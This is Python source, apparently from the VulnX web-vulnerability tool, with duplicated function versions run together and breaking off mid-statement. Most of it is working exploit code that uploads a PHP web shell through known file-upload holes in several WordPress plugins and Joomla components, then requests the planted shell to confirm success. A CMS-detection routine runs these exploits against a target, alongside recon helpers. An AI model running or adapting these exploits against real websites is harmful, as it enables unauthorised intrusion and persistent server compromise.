def webhosting_info(hostinfo): print (' %s Web Hosting Information' % (run)) urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url) getinfo = vxget(urldate,headers,timeout) regex_date = r'Date: (.+?)-(.+?)' regex_date = re.compile(regex_date) matches = re.search(regex_date,getinfo) if matches: print ( ' %s Domain Created on : %s' % (good,matches.group(1))) ip = socket.gethostbyname(hostd(url)) print ( ' %s CloudFlare IP : %s' % (good,ip)) ipinfo = "http://ipinfo.io/" + ip + "/json" getipinfo = vxget(ipinfo,headers,timeout) country = re.search(re.compile(r'country\": \"(.+?)\"'),getipinfo) region = re.search(re.compile(r'region\": \"(.+?)\"'),getipinfo) latitude = re.search(re.compile(r'latitude: (.+?)'),getipinfo) longitude = re.search(re.compile(r'longitude\": \"(.+?)\"'),getipinfo) timezone = re.search(re.compile(r'timezone\": \"(.+?)\"'),getipinfo) ans = re.search(re.compile(r'ans\": \"(.+?)\"'),getipinfo) org = re.search(re.compile(r'org\": \"(.+?)\"'),getipinfo) if country: print(' %s Country : %s' % (good,country.group(1))) if region: print(' %s Region : %s' % (good,region.group(1))) if latitude: print(' %s Latitude : %s' % (good,latitude.group(1))) if longitude: print(' %s Longitude : %s' % (good,longitude.group(1))) if timezone: print(' %s Timezone : %s' % (good,timezone.group(1))) if ans: print(' %s Ans : %s' % (good,ans.group(1))) if org: print(' %s Org : %s' % (good,org.group(1))) print ("-----------------------------------------------")
def joomla_comjdownloads2(url, headers, timeout): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/images/jdownloads/screenshots/VulnX.php" headers = {"content-type": ["form-data"]} files = open('./shell/VulnX.zip', 'rb') shell = open('./shell/VulnX.gif', 'rb') data = { 'name': 'Tig', 'mail': '*****@*****.**', 'filetitle': 'Tig', 'catlist': '1', 'license': '0', 'language': '0', 'system': '0', 'file_upload': files, 'pic_upload': shell, 'description': '<p>zot</p>', 'senden': 'Send file', 'option': 'com_jdownloads', 'view': 'upload', 'send': '1', '24c22896d6fe6977b731543b3e44c22f': '1' } response = vxget(endpoint, headers, timeout) if re.findall(r'200', response): print(' %s Com Jdownloads2 %s %s' % (que, vulnexploit, endpoint)) else: print(' %s Com Jdownloads2 %s' % (que, failexploit))
def wp_wysija(url, headers, timeout, vulnresults): theme = "my-theme" endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' headers['Content_Type'] = 'form-data' options = { 'theme': shell, 'overwriteexistingtheme': 'on', 'action': 'themeupload', 'submitter': 'Upload' } send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X" res = vxget(dump_data, headers, timeout) check_wysija = re.findall("Vuln X", res) if check_wysija: print(' %s Wysija Newsletters %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + dump_data) else: print(' %s Wysija Newsletters %s' % (que, failexploit)) vulnresults.add('[FAILED] Wysija Newsletters')
def wp_wysija(url, headers): theme = "my-theme" endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' headers['Content_Type'] = 'form-data' options = { 'theme': shell, 'overwriteexistingtheme': 'on', 'action': 'themeupload', 'submitter': 'Upload' } send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) check_wysija = re.findall("Vuln X", res) if check_wysija: print('%s [%s+%s] Wysija Newsletters%s -------------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Wysija Newsletters%s -------------- %s FAIL%s' % (W, R, W, W, R, W))
def joomla_foxcontact(url, headers, timeout): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' # foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php', # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php', # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php', # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'} endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" headers = {"content-type": ["form-data"]} fieldname = 'file' shell = open('./shell/VulnX.txt', 'rb') data = { fieldname: shell, } content = vxpost(endpoint, data, headers, timeout) path_shell = endpoint + "/images/XAttacker.txt" response = vxget(path_shell, headers, timeout) if re.findall(r'Tig', response): print(' %s Fox Contact %s %s' % (que, vulnexploit, path_shell)) else: print(' %s fox Contact %s' % (que, failexploit))
def wp_showbiz(url, headers, timeout, vulnresults): endpoint = url + "/wp-admin/admin-ajax.php" #method to randomize the user agent [functionINfunction] def random_UserAgent(): useragents_rotate = [ "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" ] useragents_random = random.choice(useragents_rotate) return useragents_random useragent = random_UserAgent() headers['User-Agent'] = useragent headers['Content_Type'] = 'multipart/form-data' options = { "action": "showbiz_ajax_action", "client_action": "update_plugin", "update_file": [open('./shell/VulnX.php', 'rb')] } send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X" res = vxget(dump_data, options) check_showbiz = re.findall("Vuln X", res) if check_showbiz: print(' %s Showbiz Pro %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + dump_data) else: print(' %s Showbiz Pro %s' % (que, failexploit)) vulnresults.add('[FAILED] Showbiz Pro')
def drupal_version(): response = vxget(url, headers, timeout) regex = 'Drupal \d{0,10}' regex = re.compile(regex) matches = regex.findall(response) if len(matches) > 0 and matches[0] != None and matches[0] != "": version = matches[0] print('%s [+] Drupal Version : %s %s' % (G, version, W))
def prestashop_version(): response = vxget(url, headers, timeout) regex = 'Prestashop \d{0,9}' regex = re.compile(regex) matches = regex.findall(response.text) if len(matches) > 0 and matches[0] != None and matches[0] != "": version = matches[0] return print('%s [+] Prestashop Version : %s %s' % (G, version, W))
def webhosting_info(): print('%s [~] Web Hosting Information %s' % (Y, W)) urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url) getinfo = vxget(urldate, headers, 3) regex_date = r'Date: (.+?)-(.+?)' regex_date = re.compile(regex_date) matches = re.search(regex_date, getinfo) if matches: print('%s [*] Domain Created on : %s' % (B, matches.group(1))) ip = socket.gethostbyname(hostd(url)) print('%s [*] CloudFlare IP : %s' % (B, ip)) ipinfo = "http://ipinfo.io/" + ip + "/json" getipinfo = vxget(ipinfo, headers, 3) country = re.search(re.compile(r'country\": \"(.+?)\"'), getipinfo) region = re.search(re.compile(r'region\": \"(.+?)\"'), getipinfo) if country: print('%s [*] Country : %s' % (B, country.group(1))) if region: print('%s [*] Region : %s' % (B, region.group(1)))
def wp_dm(url, headers, timeout, vulnresults): headers['Content_Type']: 'multipart/form-data' options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''} send_shell = vxpost(url, options, headers, timeout) dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X" content = vxget(dump_data, headers, timeout) check_dm = re.findall("Vuln X", content) if check_dm: print(' %s Download Manager %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Download Manager -- Shell:' + dump_data) else: print(' %s Download Manager %s' % (que, failexploit)) vulnresults.add('[FAILED] Download Manager')
def wp_dm(url, headers): headers['Content_Type']: 'multipart/form-data' options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''} send_shell = vxpost(url, options, headers, 3) dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X" content = vxget(dump_data, headers, 3) check_dm = re.findall("Vuln X", content) if check_dm: print('%s [%s+%s] Download Manager %s---- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Download Manager %s --- %s FAIL%s' % (W, R, W, W, R, W))
def wp_cherry(url, headers, timeout, vulnresults): headers['Content_Type']: 'multipart/form-data' options = {'file': open('./shell/VulnX.php', 'rb')} endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php" response = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X" content = vxget(dump_data, headers, timeout) check_cherry = re.findall("Vuln X", content) if check_cherry: print(' %s CherryFramework %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + dump_data) else: print(' %s CherryFramework %s' % (que, failexploit)) vulnresults.add('[FAILED] CherryFramework')
def wp_cherry(url, headers): headers['Content_Type']: 'multipart/form-data' options = {'file': open('./shell/VulnX.php', 'rb')} endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php" response = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X" content = vxget(dump_data, headers, 3) check_cherry = re.findall("Vuln X", content) if check_cherry: print('%s [%s+%s] CherryFramework%s ------------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*]Shell Uploaded Successfully \n %s link : %s%s ' % (B, W, dump_data, W)) else: print('%s [%s-%s] CherryFramework%s ------------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_adblockblocker(url,headers,timeout,vulnresults): endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2" shell = open('./shell/VulnX.php','rb') headers['Content_Type'] = 'multipart/form-data' options = { 'popimg':shell, } send_shell = vxpost(endpoint,options,headers,timeout) dump_data = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X" res=vxget(dump_data, headers,timeout) if re.findall("Vuln X", res): print (' %s adblockblocker %s %s' %(que,vulnexploit,dump_data)) vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + dump_data) else: print (' %s adblockblocker %s' %(que , failexploit)) vulnresults.add('[FAILED] adblockblocker')
def wp_adsmanager(url, headers, timeout, vulnresults): endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers['Content_Type'] = 'multipart/form-data' options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''} send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/" res = vxget(dump_data, headers, timeout) check_adsmanager = re.findall("{\"status\":\"success\"}", res) if check_adsmanager: print(' %s Simple Ads Manager %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + dump_data) else: print(' %s Simple Ads Manager %s' % (que, failexploit)) vulnresults.add('[FAILED] Simple Ads Manager')
def wp_shop(url, headers, timeout, vulnresults): endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers['Content_Type'] = 'multipart/form-data' options = {field: shell} send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X" res = vxget(dump_data, headers, timeout) check_shop = re.findall("Vuln X", res) if check_shop: print(' %s WPshop eCommerce %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + dump_data) else: print(' %s WPshop eCommerce %s' % (que, failexploit)) vulnresults.add('[FAILED] WPshop eCommerce')
def wp_inboundiomarketing(url,headers,timeout,vulnresults): endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" shell = open('./shell/VulnX.php','rb') headers['Content_Type'] = 'multipart/form-data' options = { 'file':shell, } send_shell = vxpost(endpoint,options,headers,timeout) dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X" res=vxget(dump_data, headers,timeout) check_wysija = re.findall("Vuln X", res) if check_wysija: print (' %s InBoundio Marketing %s %s' %(que,vulnexploit,dump_data)) vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + dump_data) else: print (' %s InBoundio Marketing %s' %(que , failexploit)) vulnresults.add('[FAILED] InBoundio Marketing')
def wp_adblockblocker(url, headers): endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2" shell = open('./shell/VulnX.php', 'rb') headers['Content_Type'] = 'multipart/form-data' options = { 'popimg': shell, } send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/uploads/" + year + "/" + month + "/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) if re.findall("Vuln X", res): print('%s [%s+%s] adblockblocker%s ------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] adblockblocker%s ------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_shop(url, headers): endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers['Content_Type'] = 'multipart/form-data' options = {field: shell} send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) check_shop = re.findall("Vuln X", res) if check_shop: print('%s [%s+%s] WPshop eCommerce%s ------------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] WPshop eCommerce%s ------------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_adsmanager(url, headers): endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers['Content_Type'] = 'multipart/form-data' options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''} send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/" res = vxget(dump_data, headers, 3) check_adsmanager = re.findall("{\"status\":\"success\"}", res) if check_adsmanager: print('%s [%s+%s] Simple Ads Manager%s -------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Simple Ads Manager%s -------- %s FAIL%s' % (W, R, W, W, R, W))
def domain_info(): print('%s [~] Search for SubDomains %s' % (Y, W)) searchurl = "https://www.pagesinventory.com/search/?s=" + url getinfo = vxget(searchurl, headers, 3) domains = [] #searching domain from pages inventory matches_domain = re.findall( re.compile(r'<td><a href=\"\/domain\/(.*?).html\">'), getinfo) match_ip = re.findall(re.compile(r'<a href=\"/ip\/(.*?).html\">'), getinfo) for domain in matches_domain: if domain not in domains: domains.append(domain) print('%s [*] SubDomains : %s %s' % (B, " \n [*] SubDomains : ".join(domains), W)) if match_ip and len( match_ip) > 0 and match_ip[0] != None and match_ip[0] != "": IP = match_ip[0] print('%s [*] IP : %s %s' % (B, IP, W))
def joomla_comedia(url, headers, timeout): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" headers = {"content-type": ["form-data"]} fieldname = 'Filedata[]' shell = open('./shell/VulnX.txt', 'rb') data = { fieldname: shell, } content = vxpost(endpoint, data, headers, timeout) path_shell = endpoint + "/images/XAttacker.txt" response = vxget(path_shell, headers, timeout) if re.findall(r'Tig', response): print(' %s Com Media %s %s' % (que, vulnexploit, path_shell)) else: print(' %s Com Media %s' % (que, failexploit))
def joomla_fabrik2_d(url, headers, timeout): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" headers = {"content-type": ["form-data"]} fieldname = 'file' shell = open('./shell/VulnX.txt', 'rb') data = { fieldname: shell, } content = vxpost(endpoint, data, headers, timeout) path_shell = endpoint + "/images/XAttacker.txt" response = vxget(path_shell, headers, timeout) if re.findall(r'Tig', response): print(' %s Com Fabrik2 %s %s' % (que, vulnexploit, path_shell)) else: print(' %s Com Fabrik2 %s' % (que, failexploit))
def wp_inboundiomarketing(url, headers): endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" shell = open('./shell/VulnX.php', 'rb') headers['Content_Type'] = 'multipart/form-data' options = { 'file': shell, } send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) check_wysija = re.findall("Vuln X", res) if check_wysija: print('%s [%s+%s] InBoundio Marketing%s ------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] InBoundio Marketing%s ------- %s FAIL%s' % (W, R, W, W, R, W))
def domain_info(subdomains): print (' %s Search for SubDomains' % (run)) searchurl = "https://www.pagesinventory.com/search/?s=" + url getinfo = vxget(searchurl,headers,timeout) domains = [] #searching domain from pages inventory matches_domain = re.findall(re.compile(r'<td><a href=\"\/domain\/(.*?).html\">'),getinfo) match_ip = re.findall(re.compile(r'<a href=\"/ip\/(.*?).html\">'),getinfo) if len(matches_domain) > 0: for domain in matches_domain: if domain not in domains: domains.append(domain) subdomains.add('domain : '+domain) print (' %s SubDomains : %s ' %(good," \n ".join(domains))) if match_ip and len(match_ip) > 0 and match_ip[0] != None and match_ip[0] != "": IP = match_ip[0] print (' %s IP : %s' %(good,IP)) subdomains.add('ip : '+IP) print ("-----------------------------------------------")
def wp_synoptic(url, headers, timeout, vulnresults): endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php" #shell directory shell = open('./shell/VulnX.php', 'rb') field = "qqfile" headers['Content_Type'] = 'multipart/form-data' options = {field: shell} send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X" res = vxget(dump_data, headers, timeout) check_synoptic = re.findall("Vuln X", res) if check_synoptic: print(' %s Synoptic %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Synoptic -- Shell:' + dump_data) else: print(' %s Synoptic %s' % (que, failexploit)) vulnresults.add('[FAILED] Synoptic')
def wp_synoptic(url, headers): endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php" #shell directory shell = open('./shell/VulnX.php', 'rb') field = "qqfile" headers['Content_Type'] = 'multipart/form-data' options = {field: shell} send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) check_synoptic = re.findall("Vuln X", res) if check_synoptic: print('%s [%s+%s] Synoptic%s ----------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Synoptic%s ----------- %s FAIL%s' % (W, R, W, W, R, W))
def joomla_comjce(url, headers): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20" data = { 'upload-dir': './../../', 'upload-overwrite': 0, 'Filedata': [open('./shell/VulnX.gif', 'rb')], 'action': 'Upload' } content = vxpost(endpoint, data, headers, 15) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect(url, 80) path_shell = url + "/VulnX.gif" res = vxget(path_shell, headers, 3) if re.findall(r'/image/gif/', res): print('%s [%s+%s] Com Jce%s ------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, path_shell, W)) else: print('%s [%s-%s] Com Jce%s ------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_showbiz(url, headers): endpoint = url + "/wp-admin/admin-ajax.php" #method to randomize the user agent [functionINfunction] def random_UserAgent(): useragents_rotate = [ "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" ] useragents_random = random.choice(useragents_rotate) return useragents_random useragent = random_UserAgent() headers['User-Agent'] = useragent headers['Content_Type'] = 'multipart/form-data' options = { "action": "showbiz_ajax_action", "client_action": "update_plugin", "update_file": [open('./shell/VulnX.php', 'rb')] } send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X" res = vxget(dump_data, options) check_showbiz = re.findall("Vuln X", res) if check_showbiz: print('%s [%s+%s] Showbiz Pro%s ------------ %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Showbiz Pro%s ------------ %s FAIL%s' % (W, R, W, W, R, W))
def detect_cms(): id = 0 lm = url + '/smiley/1.gif' lm_content = vxget(lm, headers) lm2 = url + '/rss.xml' lm2_content = vxget(lm2, headers) content = vxget(url, headers) # try: ############################ # # # joomla # # # ############################ #joomla searching content to detect. if re.search( re.compile( r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!' ), content): print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s %sCMS :%s Joomla' % (good, W, end)) print('------------------------------------------------') #webinfo gathering argument if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: domain_info(subdomains) if cms == 'version': print(' %s Check CMS Info' % (run)) prestashop_version() #port to scan if scanports: print(' %s Scanning Ports\n' % (run)) print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W)) portscan(hostd(url)) print("-----------------------------------------------") #joomla_exploits imported from folder[./common/joomla_exploits.py] if exploit: print(' %s Check Vulnerability\n' % (run)) print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W)) joomla_comjce(url, headers, timeout) joomla_comedia(url, headers, timeout) joomla_comjdownloads(url, headers, timeout) joomla_comjdownloads2(url, headers, timeout) joomla_fabrik2(url, headers, timeout) joomla_fabrik2_d(url, headers, timeout) joomla_foxcontact(url, headers, timeout) ############################ # # # Wordpress # # # ############################ #wordpress searching content to detect. elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content): print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s %sCMS :%s Wordpress' % (good, W, end)) print('------------------------------------------------') if webinfo: webhosting_info(hostinfo) if domaininfo: domain_info(subdomains) #wp_grab methods info from (folder)[./common/grapwp.py] if cms == 'version': print(' %s Check CMS Info' % (run)) wp_version(url, headers, grabinfo) print("-----------------------------------------------") if cms == 'themes': print(' %s Check CMS Info' % (run)) wp_themes(url, headers, grabinfo) print("-----------------------------------------------") if cms == 'user': print(' %s Check CMS Info' % (run)) wp_user(url, headers, grabinfo) print("-----------------------------------------------") if cms == 'plugins': print(' %s Check CMS Info' % (run)) wp_plugin(url, headers, grabinfo) print("-----------------------------------------------") if cms == 'all': print(' %s Check CMS Info' % (run)) wp_version(url, headers, grabinfo) wp_themes(url, headers, grabinfo) wp_user(url, headers, grabinfo) wp_plugin(url, headers, grabinfo) print("-----------------------------------------------") #port to scan if scanports: print(' %s Scanning Ports\n' % (run)) print(""" %sPORTS %sSTATUS %sPROTO""" % (W, W, W)) portscan(hostd(url)) print("-----------------------------------------------") # vulnx -u http://example.com -e | vulnx -u http://example --exploit if exploit: print(' %s Check Vulnerability\n' % (run)) print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W)) #wp_exploit methods from (dolder)[./common/wp_exploits.py] wp_wysija(url, headers, timeout, vulnresults) wp_blaze(url, headers, timeout, vulnresults) wp_synoptic(url, headers, timeout, vulnresults) wp_catpro(url, headers, timeout, vulnresults) wp_cherry(url, headers, timeout, vulnresults) wp_dm(url, headers, timeout, vulnresults) wp_fromcraft(url, headers, timeout, vulnresults) wp_jobmanager(url, headers, timeout, vulnresults) wp_showbiz(url, headers, timeout, vulnresults) wp_shop(url, headers, timeout, vulnresults) wp_powerzoomer(url, headers, timeout, vulnresults) wp_revslider(url, headers, timeout, vulnresults) wp_adsmanager(url, headers, timeout, vulnresults) wp_inboundiomarketing(url, headers, timeout, vulnresults) wp_adblockblocker(url, headers, timeout, vulnresults) wp_levoslideshow(url, headers, timeout, vulnresults) print("-----------------------------------------------") ############################ # # # Drupal # # # ############################ #drupal searching content to detect. elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content): print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s CMS : Drupal' % (good)) print('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: domain_info(subdomains) if cms == 'version': print(' %s Check CMS Info' % (run)) drupal_version() if scanports: print(' %s Scanning Ports\n' % (run)) print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W)) portscan(hostd(url)) print("-----------------------------------------------") if exploit: print(' %s Check Vulnerability\n' % (run)) print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W)) ############################ # # # Prestashop # # # ############################ #prestashop searching content to detect. elif re.search(re.compile(r'Prestashop|prestashop'), content): print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s %sCMS :%s Prestashop' % (good, W, end)) print('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: domain_info(subdomains) if cms == 'version': print(' %s Check CMS Info' % (run)) prestashop_version() if scanports: print(' %s Scanning Ports\n' % (run)) print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W)) portscan(hostd(url)) print("-----------------------------------------------") if exploit: print(' %s Check Vulnerability\n' % (run)) print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W)) ############################ # # # OpenCart # # # ############################ #opencart searching content to detect. elif re.search( re.compile( r'route=product|OpenCart|route=common|catalog/view/theme'), content): print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s CMS : OpenCart' % (good)) print('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: domain_info(subdomains) if cms == 'version': print(' %s Check CMS Info' % (run)) if scanports: print(' %s Scanning Ports\n' % (run)) print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W)) portscan(hostd(url)) print("-----------------------------------------------") if exploit: print(' %s Check Vulnerability\n' % (run)) print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W)) ############################ # # # Magento # # # ############################ #magento searching content to detect. elif re.search( re.compile( r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento' ), content): print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end)) print('------------------------------------------------') print(' %s looking for cms' % (que)) print(' %s CMS : Magento' % (good)) print('------------------------------------------------') if webinfo: webhosting_info(hostinfo) #domain gatherinargument if domaininfo: domain_info(subdomains) if cms == 'version': print(' %s Check CMS Info' % (run)) if scanports: 